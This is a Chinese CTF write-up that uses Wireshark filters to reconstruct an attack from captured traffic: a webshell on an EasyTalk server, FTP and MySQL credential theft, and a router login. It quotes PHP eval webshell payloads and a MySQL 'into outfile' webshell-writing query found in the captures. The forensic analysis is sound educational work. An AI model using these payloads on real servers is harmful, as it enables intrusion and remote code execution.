2018.5.18信息安全铁人三项赛数据赛题解

2024-03-11 00:40

本文主要是介绍2018.5.18信息安全铁人三项赛数据赛题解,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!


本文原创作者:一叶飘零

原创投稿详情:重金悬赏 | 合天原创投稿等你

目录

题目描述 

第一个数据包 

第三个数据包 

第四个数据包 

路由器hacking 

后记 

题目描述

1.黑客的IP是多少

2.服务器1.99的web服务器使用的CMS及其版本号(请直接复制)

3.服务器拿到的webshell的网址(请输入url解码后的网址)

4.服务器1.99的主机名

5.网站根目录的绝对路径(注意最后加斜杠)

6.黑客上传的第一个文件名称是什么

7.黑客进行内网扫描,扫描的端口都有哪些(端口从小到大,用英文逗号分隔)

8.服务器2.88的ftp服务账号密码(格式:账号/密码)

9.黑客成功登陆ftp的时间(格式:10:15:36)

10.黑客在ftp中下载的敏感文件名称是什么

11.服务器2.88中用户名为admin_zz的web后台管理员的密码

12.服务器2.88的mysql账号密码(格式:账号/密码)

13.服务器2.88的mysql服务中有和admin有关的三个表,请按照黑客的查询顺序作答,使用空格分隔

14.请列出黑客设置的genreallog的绝对路径(将路径复制出来,区分大小写)

15.路由器的品牌、型号、版本(请直接复制粘贴)

16.列出路由器的所有IP地址(格式:从小到大,用英文逗号分隔)

17.在路由器的端口监控中,监控端口和被监控端口分别是多少,例,1号端口监控2/3/4号端口:1-->2,3,4

18.路由器一共有几个接口?其中有几个WAN口启用?有几个LAN口启用(格式:用英文逗号分隔)

19.路由器的系统路由表中一共有几条?第三条的子网掩码是多少。例:255 255.255.0则为24(格式:用英文逗号分隔)

20.路由器的5Gwif名称是什么,信道是多少(格式:名称信道)

题目文件:

链接:https://pan.baidu.com/s/1DKTlpELe4WSBvkb2pU7vQQ 

密码:shna

第一个数据包

上来先过滤http流量,随意浏览

可以发现202.1.1.2执行了phpinfo()命令

无疑是黑客ip,而192.168.1.99显然就是受害者了

我们进一步利用这一特点,进行过滤

(ip.addr== 202.1.1.2 || ip.addr == 192.168.1.99) && http

为确定服务器使用的CMS和版本号,我们抽取一个192.168.1.99的响应,看看前端响应里会不会包含

随意跟踪一个ip.src==192.168.1.99的http响应

我们定位到Poweredby

不难发现

版本号和CMS一目了然

EasyTalkX2.0.1

同时利用

(ip.addr== 202.1.1.2 || ip.addr == 192.168.1.99) && http

过滤不难看出有如下url

解码后得到

http://202.1.1.1/index.php/module/action/param1/${@print(eval($_POST[c]))}

即可利用的webshell

随后想起有phpinfo,即可以泄露大量服务器信息,我们去拷贝下响应的html源码

保存到本地,打开即可看到许多信息

服务器1.99的主机名和网站根目录的绝对路径一目了然

答案分别为

simplefight1

/var/www/html/easytalk

接着既然要找出上传文件,于是使用过滤

ip.addr== 202.1.1.2 && http.request.method == POST

不然找到如下信息

解码z1查看文件名

/var/www/html/easytalk/scan.php

发现为scan.php

顾名思义,扫描,于是我们过滤这个文件,查看黑客的扫描

ip.addr== 202.1.1.2 && http contains "scan.php"

问题一目了然

可见起始ip:192.168.0.1

结束ip:192.168.3.255

扫描端口:21,80,8080,1433,3306

至此我们归纳一下答案

1.黑客的IP是多少

202.1.1.2

2.服务器1.99的web服务器使用的CMS及其版本号(请直接复制)

EasyTalkX2.0.1

3.服务器拿到的webshell的网址(请输入url解码后的网址)

http://202.1.1.1/index.php/module/action/param1/${@print(eval($_POST[c]))}

4.服务器1.99的主机名

simplefight1

5.网站根目录的绝对路径(注意最后加斜杠)

/var/www/html/easytalk

6.黑客上传的第一个文件名称是什么

scan.php

7.黑客进行内网扫描,扫描的端口都有哪些(端口从小到大,用英文逗号分隔)

21,80,8080,1433,3306

第二个数据包

既然要找ftp的账号密码,肯定是利用之前打下的机子作为跳板,进一步攻击内网

那么此时我们只需要过滤

ip.src== 192.168.1.99 && ftp

即可查看所有登录信息

选中最后一项

不难看出账户密码为:`administrator:123456`

然后再过滤

ip.addr== 192.168.1.99 && ftp

找到对应密码为123456登录的消息

可以看到登录时间

14:07:15

可以发现黑客在第二个数据包里只进行了操作

CWD改变工作目录

PWD打印工作目录,返回主机的当前目录

PASV进入被动模式

LIST如果指定了文件或目录,返回其信息;否则返回当前工作目录的信息

而下载命令为

RETR传输文件副本

所以我们切换到第三个数据包中

第三个数据包

我们根据之前的分析,使用命令

ip.src== 192.168.1.99 && ftp contains "RETR"

即可一目了然

下载文件名为

/phpStudy/WWW/config/config_db.php

我们跟进查看一下,毕竟是重要配置文件

ip.addr== 192.168.1.99 && ftp-data

可以得到配置

php

<?php

/*

con_db_host= "localhost"

con_db_id  = "root"

con_db_pass ="S1mp13zz"

con_db_name= "met"

tablepre   =  "met_"

db_charset =  "utf8";

*/

?>

即mysql账号密码:`localhost/S1mp13zz`

下面我们去寻找admin_zz的密码

ip.addr== 192.168.1.99 && http contains "admin_zz"

答案同样一目了然

密码为`1q2w3e4r`

然后需要我们查找admin相关的表,但是我们知道,表前缀为:`met_`

所以我们可以过滤

ip.addr== 192.168.1.99 && mysql contains "met_"

结果依旧显然,正好3个查询,3个有关管理员的表也出现了

select* from met_admin_array

select* from met_admin_column

select* from met_admin_table

met_admin_array,met_admin_column,met_admin_table

我们来总结一下这个阶段的答案

8.服务器2.88的ftp服务账号密码(格式:账号/密码)

administrator:123456

9.黑客成功登陆ftp的时间(格式:10:15:36)

14:07:15

10.黑客在ftp中下载的敏感文件名称是什么

config_db.php

11.服务器2.88中用户名为admin_zz的web后台管理员的密码

1q2w3e4r

12.服务器2.88的mysql账号密码(格式:账号/密码)

localhost/S1mp13zz

13.服务器2.88的mysql服务中有和admin有关的三个表,请按照黑客的查询顺序作答,使用空格分隔

met_admin_arraymet_admin_column met_admin_table

第四个数据包

我们直接过滤

ip.addr== 192.168.1.99 && mysql

不难发现,黑客想在192.168.2.88的机器上留shell

select'<?php eval($_POST[a]);?>' into outfile'c:/phpStudy/WWW/aaa.php'

但是返回了错误

TheMySQL server is running with the --secure-file-priv option so itcannot execute this statement

于是黑客进行了一系列的更改

在后续的一条操作中,可以明显看到

setglobal general_log_file='c:/phpStudy/WWW/config/config.php'

路径为

c:/phpStudy/WWW/config/config.php

同时可以确定192.168.2.88为一台windows

路由器hacking

剩下的5个题均为路由器的题,这就很难受了,之前一直很少接触路由器的流量分析

后来转念一想,路由器一般都是192.168.0.1吧

于是我查了一下这个ip

ip.addr== 192.168.0.1 && http

发现的确是有web服务的

我们进行查找

很快,在第一个返回200的包里就找到了答案

{"id":1, "result":{ "locale":"zh_CN","force":false, "radio":2, "model":"TL-WAR1300Lv1.0" }, "error_code":"0" }

答案为

TL-WAR1300Lv1.0

我们系统的看一下这些流量,不难发现,黑客先进行了密码爆破

而之前的登录error_code均为700

可见最后黑客成功登入

然后黑客进行了read选项

才有了如上的版本信息

然后我们看到黑客进行了如下操作

然后得到回显

{

"id":1,

"result": {

"normal": [{

"py_isup": false,

"ipaddr": "",

"t_type":"ethernet",

"t_isup":"disconnect",

"t_name": "WAN1",

"t_linktype": "dhcp"

},{

"py_isup": false,

"ipaddr": "",

"t_type":"ethernet",

"t_isup":"disconnect",

"t_name": "WAN2",

"t_linktype": "dhcp"

},{

"py_isup": false,

"ipaddr": "",

"dhcp_status": "on",

"t_type":"ethernet",

"t_name": "LAN1",

"t_isup":"disconnect",

"t_linktype":"static"

},{

"py_isup": false,

"ipaddr": "",

"dhcp_status": "on",

"t_type":"ethernet",

"t_name": "LAN2",

"t_isup":"disconnect",

"t_linktype":"static"

},{

"py_isup": false,

"ipaddr": "",

"dhcp_status": "on",

"t_type":"ethernet",

"t_name": "LAN3",

"t_isup":"disconnect",

"t_linktype":"static"

}]

},

"error_code": "0"

}

目前2个wan和2个LAN都是关闭状态,`py_isup`清晰可见

接着后面又出现了一个类似的内容

{

"id":1,

"result":{

"normal":[

{

"py_isup":true,

"ipaddr":"202.1.1.1",

"t_type":"ethernet",

"t_isup":"connect",

"t_name":"WAN1",

"t_linktype":"static"

},

{

"py_isup":true,

"ipaddr":"192.168.12.173",

"t_type":"ethernet",

"t_isup":"internet",

"t_name":"WAN2",

"t_linktype":"dhcp"

},

{

"py_isup":true,

"ipaddr":"192.168.0.1",

"dhcp_status":"on",

"t_type":"ethernet",

"t_name":"LAN1",

"t_isup":"connect",

"t_linktype":"static"

},

{

"py_isup":true,

"ipaddr":"192.168.0.1",

"dhcp_status":"on",

"t_type":"ethernet",

"t_name":"LAN2",

"t_isup":"connect",

"t_linktype":"static"

},

{

"py_isup":false,

"ipaddr":"192.168.0.1",

"dhcp_status":"on",

"t_type":"ethernet",

"t_name":"LAN3",

"t_isup":"disconnect",

"t_linktype":"static"

}

]

},

"error_code":"0"

}

此时可以发现一共有5个接口,其中WAN1、WAN2、LAN1、LAN2均被打开

并且ip为:

202.1.1.1

192.168.12.173

192.168.0.1

故此16,18题均被解答

然后是子网掩码的问题,这里我选择搜索网关相关内容

ip.addr== 192.168.0.1 && http contains "gateway"

然后可以发现如下数据

{

"id":1,

"result":[

{

"metric":"0",

"gateway":"192.168.12.254",

"mask":"0.0.0.0",

"dest":"0.0.0.0",

"interface":"WAN2"

},

{

"metric":"0",

"gateway":"0.0.0.0",

"mask":"255.0.0.0",

"dest":"127.0.0.0",

"interface":"lo"

},

{

"metric":"0",

"gateway":"0.0.0.0",

"mask":"255.255.252.0",

"dest":"192.168.0.0",

"interface":"LAN"

},

{

"metric":"0",

"gateway":"0.0.0.0",

"mask":"255.255.255.0",

"dest":"192.168.12.0",

"interface":"WAN2"

},

{

"metric":"0",

"gateway":"0.0.0.0",

"mask":"255.255.255.0",

"dest":"202.1.1.0",

"interface":"WAN1"

}

],

"error_code":"0"

}

所以一共有5条,第三条为

{

"metric":"0",

"gateway":"0.0.0.0",

"mask":"255.255.252.0",

"dest":"192.168.0.0",

"interface":"LAN"

}

子网掩码为`255.255.252.0`

至此19题完结

然后最后问到信道,于是我的过滤为

ip.addr== 192.168.0.1 && http contains "channel"

得到数据

{

"id":1,

"result":{

"1":{

"mssid":[

"test-ge1"

],

"wds":"off",

"channel":36,

"mode":"11anacmixed",

"radio_enable":"on",

"amount":0,

"frequency":"5G"

},

"0":{

"mssid":[

"test-ge1"

],

"wds":"off",

"channel":1,

"mode":"11bgnmixed",

"radio_enable":"on",

"amount":1,

"frequency":"2.4G"

},

"2":{

"mssid":[

"TP-LINK_GUEST_6258"

],

"amount":0,

"mode":"11bgnmixed",

"radio_enable":"off",

"frequency":"visitor"

}

},

"error_code":"0"

}

重点为

"1":{

"mssid":[

"test-ge1"

],

"wds":"off",

"channel":36,

"mode":"11anacmixed",

"radio_enable":"on",

"amount":0,

"frequency":"5G"

}

可以清晰看到,名称为`test-ge1`,信道为36

然后是最最蛇皮的17问:在路由器的端口监控中,监控端口和被监控端口分别是多少,例,1号端口监控2/3/4号端口:1-->2,3,4

这个我可以说相当薄弱了,并不是很懂,但是其中提及端口,于是我的关键词为

ip.addr== 192.168.0.1 && http contains "port"

数据并不是很多,看到最后有

{"id":1, "result":{ "state":"on","mode":"both", "mirroredports":[ "1","2" ], "mirrorport":"3" },"error_code":"0" }

可以断定答案为

3-->1,2

最后阶段归纳一下答案

14.请列出黑客设置的genreallog的绝对路径(将路径复制出来,区分大小写)

c:/phpStudy/WWW/config/config.php

15.路由器的品牌、型号、版本(请直接复制粘贴)

TL-WAR1300Lv1.0

16.列出路由器的所有IP地址(格式:从小到大,用英文逗号分隔)

192.168.0.1,192.168.12.173,202.1.1.1

17.在路由器的端口监控中,监控端口和被监控端口分别是多少,例,1号端口监控2/3/4号端口:1-->2,3,4

3-->1,2

18.路由器一共有几个接口?其中有几个WAN口启用?有几个LAN口启用(格式:用英文逗号分隔)

5,2,2

19.路由器的系统路由表中一共有几条?第三条的子网掩码是多少。例:255 255.255.0则为24(格式:用英文逗号分隔)

5,255.255.252.0

20.路由器的5Gwif名称是什么,信道是多少(格式:名称信道)

test-ge136

后记

最后完整答案为:

1.黑客的IP是多少

202.1.1.2

2.服务器1.99的web服务器使用的CMS及其版本号(请直接复制)

EasyTalkX2.0.1

3.服务器拿到的webshell的网址(请输入url解码后的网址)

http://202.1.1.1/index.php/module/action/param1/${@print(eval($_POST[c]))}

4.服务器1.99的主机名

simplefight1

5.网站根目录的绝对路径(注意最后加斜杠)

/var/www/html/easytalk

6.黑客上传的第一个文件名称是什么

scan.php

7.黑客进行内网扫描,扫描的端口都有哪些(端口从小到大,用英文逗号分隔)

21,80,8080,1433,3306

8.服务器2.88的ftp服务账号密码(格式:账号/密码)

administrator:123456

9.黑客成功登陆ftp的时间(格式:10:15:36)

14:07:15

10.黑客在ftp中下载的敏感文件名称是什么

config_db.php

11.服务器2.88中用户名为admin_zz的web后台管理员的密码

1q2w3e4r

12.服务器2.88的mysql账号密码(格式:账号/密码)

localhost/S1mp13zz

13.服务器2.88的mysql服务中有和admin有关的三个表,请按照黑客的查询顺序作答,使用空格分隔

met_admin_arraymet_admin_column met_admin_table

14.请列出黑客设置的genreallog的绝对路径(将路径复制出来,区分大小写)

c:/phpStudy/WWW/config/config.php

15.路由器的品牌、型号、版本(请直接复制粘贴)

TL-WAR1300Lv1.0

16.列出路由器的所有IP地址(格式:从小到大,用英文逗号分隔)

192.168.0.1,192.168.12.173,202.1.1.1

17.在路由器的端口监控中,监控端口和被监控端口分别是多少,例,1号端口监控2/3/4号端口:1-->2,3,4

3-->1,2

18.路由器一共有几个接口?其中有几个WAN口启用?有几个LAN口启用(格式:用英文逗号分隔)

5,2,2

19.路由器的系统路由表中一共有几条?第三条的子网掩码是多少。例:255 255.255.0则为24(格式:用英文逗号分隔)

5,255.255.252.0

20.路由器的5Gwif名称是什么,信道是多少(格式:名称信道)

test-ge136

没想到最后竟然突然来了个路由器hacking,完全摸不到边,纯靠题目转英文进行过滤……

最蛇皮的是最后2个包都没用到,希望可以加强自身各种类型的流量分析的能力吧==

看不过瘾?合天2017年度干货精华请点击《【精华】2017年度合天网安干货集锦》

别忘了投稿哦!

合天公众号开启原创投稿啦!!!

大家有好的技术原创文章。

欢迎投稿至邮箱:edu@heetian.com

合天会根据文章的时效、新颖、文笔、实用等多方面评判给予100元-500元不等的稿费哟。

有才能的你快来投稿吧!

点击了解投稿详情 重金悬赏 | 合天原创投稿等你来!

这篇关于2018.5.18信息安全铁人三项赛数据赛题解的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/796057

相关文章

使用Python开发一个Ditto剪贴板数据导出工具

《使用Python开发一个Ditto剪贴板数据导出工具》在日常工作中,我们经常需要处理大量的剪贴板数据,下面将介绍如何使用Python的wxPython库开发一个图形化工具,实现从Ditto数据库中读... 目录前言运行结果项目需求分析技术选型核心功能实现1. Ditto数据库结构分析2. 数据库自动定位3

pandas数据的合并concat()和merge()方式

《pandas数据的合并concat()和merge()方式》Pandas中concat沿轴合并数据框(行或列),merge基于键连接(内/外/左/右),concat用于纵向或横向拼接,merge用于... 目录concat() 轴向连接合并(1) join='outer',axis=0(2)join='o

批量导入txt数据到的redis过程

《批量导入txt数据到的redis过程》用户通过将Redis命令逐行写入txt文件,利用管道模式运行客户端,成功执行批量删除以Product*匹配的Key操作,提高了数据清理效率... 目录批量导入txt数据到Redisjs把redis命令按一条 一行写到txt中管道命令运行redis客户端成功了批量删除k

SpringBoot多环境配置数据读取方式

《SpringBoot多环境配置数据读取方式》SpringBoot通过环境隔离机制,支持properties/yaml/yml多格式配置,结合@Value、Environment和@Configura... 目录一、多环境配置的核心思路二、3种配置文件格式详解2.1 properties格式(传统格式)1.

解决pandas无法读取csv文件数据的问题

《解决pandas无法读取csv文件数据的问题》本文讲述作者用Pandas读取CSV文件时因参数设置不当导致数据错位,通过调整delimiter和on_bad_lines参数最终解决问题,并强调正确参... 目录一、前言二、问题复现1. 问题2. 通过 on_bad_lines=‘warn’ 跳过异常数据3

C#监听txt文档获取新数据方式

《C#监听txt文档获取新数据方式》文章介绍通过监听txt文件获取最新数据,并实现开机自启动、禁用窗口关闭按钮、阻止Ctrl+C中断及防止程序退出等功能,代码整合于主函数中,供参考学习... 目录前言一、监听txt文档增加数据二、其他功能1. 设置开机自启动2. 禁止控制台窗口关闭按钮3. 阻止Ctrl +

java如何实现高并发场景下三级缓存的数据一致性

《java如何实现高并发场景下三级缓存的数据一致性》这篇文章主要为大家详细介绍了java如何实现高并发场景下三级缓存的数据一致性,文中的示例代码讲解详细,感兴趣的小伙伴可以跟随小编一起学习一下... 下面代码是一个使用Java和Redisson实现的三级缓存服务,主要功能包括:1.缓存结构:本地缓存:使

在MySQL中实现冷热数据分离的方法及使用场景底层原理解析

《在MySQL中实现冷热数据分离的方法及使用场景底层原理解析》MySQL冷热数据分离通过分表/分区策略、数据归档和索引优化,将频繁访问的热数据与冷数据分开存储,提升查询效率并降低存储成本,适用于高并发... 目录实现冷热数据分离1. 分表策略2. 使用分区表3. 数据归档与迁移在mysql中实现冷热数据分

C#解析JSON数据全攻略指南

《C#解析JSON数据全攻略指南》这篇文章主要为大家详细介绍了使用C#解析JSON数据全攻略指南,文中的示例代码讲解详细,感兴趣的小伙伴可以跟随小编一起学习一下... 目录一、为什么jsON是C#开发必修课?二、四步搞定网络JSON数据1. 获取数据 - HttpClient最佳实践2. 动态解析 - 快速

MyBatis-Plus通用中等、大量数据分批查询和处理方法

《MyBatis-Plus通用中等、大量数据分批查询和处理方法》文章介绍MyBatis-Plus分页查询处理,通过函数式接口与Lambda表达式实现通用逻辑,方法抽象但功能强大,建议扩展分批处理及流式... 目录函数式接口获取分页数据接口数据处理接口通用逻辑工具类使用方法简单查询自定义查询方法总结函数式接口